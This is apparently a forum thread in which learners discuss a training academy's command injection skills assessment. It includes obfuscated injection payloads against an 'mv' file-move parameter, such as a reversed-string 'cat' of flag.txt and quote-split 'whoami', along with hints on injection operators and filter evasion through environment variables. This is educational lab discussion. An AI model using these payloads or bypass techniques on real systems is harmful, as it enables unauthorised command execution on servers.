Academy command injection skills assessment


I am trying to solve the Command Injection Skills Assessment.
I have tried the below payloads but I am unable to solve the issue. could anyone guide me to solve this.

Parameter: from
Payload: 696212415.txt&&w’h’o’am’i
$(rev<<<‘txt.galf/. tac’)

Error while moving: mv: missing destination file operand after ‘/var/www/html/files/696212415.txt’
Try ‘mv --help’ for more information.

You try to insert into a command like mv from to.

The Unix mv needs two arguments from and to. You must create an code injection which yield a valid mv command call followed by a command call you like to execute.

You can develop the needed arguments with a local bash. Like

mv $from $to

If the arguments for from and to worked local, then you can test the bash command injection on the server.

Hi Xtal,

Thank you for the information, I have solved the assessment.
Need to identify the working injection operator (|| or && or & or $() or :wink: and then find the proper payload to read the flag.txt (use o’bf’usc’at’ion or proper encoding and replace the filtered characters with environment variables or alternate characters)
Some time, the content of the flag.txt will appear with error message.


Hi Appsec,

Currently working on this one, just keep getting hit with 302s so not sure where any purchase is. Do you know if I can use either download, copy, or move - will intercepting and injecting any of these commands work, or is there a specific one that’s the way in and if so do you know why? Thanks!

@Appsec Your hints helped me to get “flag.txt” :grin:

Any tips about how to find the injection point?

the input parameter is the injection point

1 Like

Thanks, this hint helped me a lot.

After you identify the vulnerable api endpoint, you see the error message contains something you could control. then why not just put flag here? use technique you’ve learned before, it just works.

By the way, if you try to do something to some folder, then you could download the source code of this vulnerable application.